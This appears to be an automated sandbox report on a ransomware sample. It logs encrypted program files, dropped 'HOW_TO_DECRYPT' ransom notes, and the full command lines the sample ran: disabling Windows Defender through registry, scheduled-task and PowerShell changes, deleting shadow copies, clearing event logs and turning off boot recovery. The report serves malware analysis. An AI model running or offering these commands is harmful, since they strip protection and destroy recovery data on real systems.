| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.DPV.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299611.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2b7e39c68da69d1497cc11c82c42d3d6 |
| SHA1 | 3aec83be70b8accab3d07213a0035196bf10167e |
| SHA256 | 0a4de6bb3d62b930fefcedb8dc0970ccd3078e1be88341330d56708baec0dde7 |
| SHA512 | 6a1d318bff9f3c04b1725532ba9ef36d693cfc9a20eff1ac84a6cb089f15e148d18725368fa90890ce476d8b8aa1fe4745feb917b74b9ad6501200269fa10afd |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 14:02
Reported
2022-01-13 14:07
Platform
win10-en-20211208
Max time kernel
166s
Max time network
122s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-ms.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_LgAAAC4AAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\THMBNAIL.PNG.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-30_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Tab\TabCalendar.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EgAAABIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FAAAABQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\LargeLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\agavedefaulticon96x96.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Fonts\FHubMDL2.ttf | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_KgAAACoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_LAAAACwAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FgAAABYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XML.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FAAAABQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_MAAAADAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_JA-JP.respack | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_11c.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
